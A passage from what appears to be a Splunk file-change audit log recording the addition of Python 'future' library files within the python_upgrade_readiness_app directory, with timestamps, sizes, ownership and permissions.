modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.532, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/application.py", isdir=0, size=1401, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.529, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.423, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/utils.py", isdir=0, size=14270, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.420, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/quoprimime.py", isdir=0, size=10923, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.416, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/policy.py", isdir=0, size=8823, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.412, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/parser.py", isdir=0, size=5312, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.407, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.403, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/message.py", isdir=0, size=35225, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.397, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/iterators.py", isdir=0, size=2348, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.393, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/headerregistry.py", isdir=0, size=20637, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.388, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/header.py", isdir=0, size=24448, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.383, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/generator.py", isdir=0, size=19520, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.379, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/feedparser.py", isdir=0, size=22736, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.374, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/errors.py", isdir=0, size=3680, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.367, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/encoders.py", isdir=0, size=2800, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.363, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/charset.py", isdir=0, size=17439, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.357, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/base64mime.py", isdir=0, size=3729, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.352, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/_policybase.py", isdir=0, size=14647, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.347, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/_parseaddr.py", isdir=0, size=17389, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.343, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/_header_value_parser.py", isdir=0, size=104692, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.339, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/_encoded_words.py", isdir=0, size=8443, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.333, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/__init__.py", isdir=0, size=2269, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.129, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/xmlrpc", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.125, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/urllib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.122, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/total_ordering.py", isdir=0, size=1929, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.119, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.114, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/socketserver.py", isdir=0, size=24286, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.110, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/socket.py", isdir=0, size=15663, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.107, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/misc.py", isdir=0, size=32602, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.104, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/http", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.100, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/html", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.097, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.094, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/datetime.py", isdir=0, size=75552, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.090, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/_markupbase.py", isdir=0, size=16215, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.086, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/__init__.py", isdir=0, size=530, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.983, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/tests/base.py", isdir=0, size=19706, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.978, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/tests/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.973, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/builtins/newsuper.py", isdir=0, size=4146, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.969, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/builtins/newround.py", isdir=0, size=3096, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.965, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/builtins/newnext.py", isdir=0, size=2009, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.959, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/builtins/misc.py", isdir=0, size=4087, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.954, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/builtins/iterators.py", isdir=0, size=1396, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.950, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/builtins/disabled.py", isdir=0, size=2109, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.946, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/builtins/__init__.py", isdir=0, size=1664, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.841, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/utils/surrogateescape.py", isdir=0, size=6097, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.837, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/utils/__init__.py", isdir=0, size=20325, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.833, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/standard_library/__init__.py", isdir=0, size=27743, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.829, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/http/server.py", isdir=0, size=606, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.821, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/http/cookies.py", isdir=0, size=233, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.817, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/http/cookiejar.py", isdir=0, size=173, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.812, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/http/client.py", isdir=0, size=165, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.809, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/http/__init__.py", isdir=0, size=71, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.703, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/urllib/robotparser.py", isdir=0, size=179, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.699, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/urllib/response.py", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.695, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/urllib/request.py", isdir=0, size=3517, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.691, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/urllib/parse.py", isdir=0, size=1045, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.687, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/urllib/error.py", isdir=0, size=479, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.683, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/urllib/__init__.py", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.680, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/xmlrpc/server.py", isdir=0, size=143, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.676, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/xmlrpc/client.py", isdir=0, size=143, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.673, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/xmlrpc/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.569, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/test/support.py", isdir=0, size=259, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.565, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/test/__init__.py", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.561, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/dbm/ndbm.py", isdir=0, size=162, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.557, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/dbm/gnu.py", isdir=0, size=162, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.552, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/dbm/dumb.py", isdir=0, size=166, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.548, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/dbm/__init__.py", isdir=0, size=488, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.544, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/html/parser.py", isdir=0, size=167, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.540, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/html/entities.py", isdir=0, size=177, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.536, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/html/__init__.py", isdir=0, size=1016, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.532, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/ttk.py", isdir=0, size=302, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.528, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/tix.py", isdir=0, size=302, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.524, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/simpledialog.py", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.518, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/scrolledtext.py", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.514, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/messagebox.py", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.510, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/font.py", isdir=0, size=309, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.506, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/filedialog.py", isdir=0, size=323, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.500, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/dnd.py", isdir=0, size=306, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.495, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/dialog.py", isdir=0, size=311, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.488, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/constants.py", isdir=0, size=324, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.485, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/commondialog.py", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.482, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/colorchooser.py", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.476, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter/__init__.py", isdir=0, size=620, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.272, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/xmlrpc", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.268, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/winreg.py", isdir=0, size=163, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.264, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/urllib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.261, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/tkinter", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.257, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/test", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.253, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/sys.py", isdir=0, size=132, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.249, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/subprocess.py", isdir=0, size=251, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.244, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/socketserver.py", isdir=0, size=174, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.240, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/reprlib.py", isdir=0, size=161, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.236, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/queue.py", isdir=0, size=160, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.233, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/pickle.py", isdir=0, size=229, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.228, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/itertools.py", isdir=0, size=158, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:48.223, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/moves/http", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 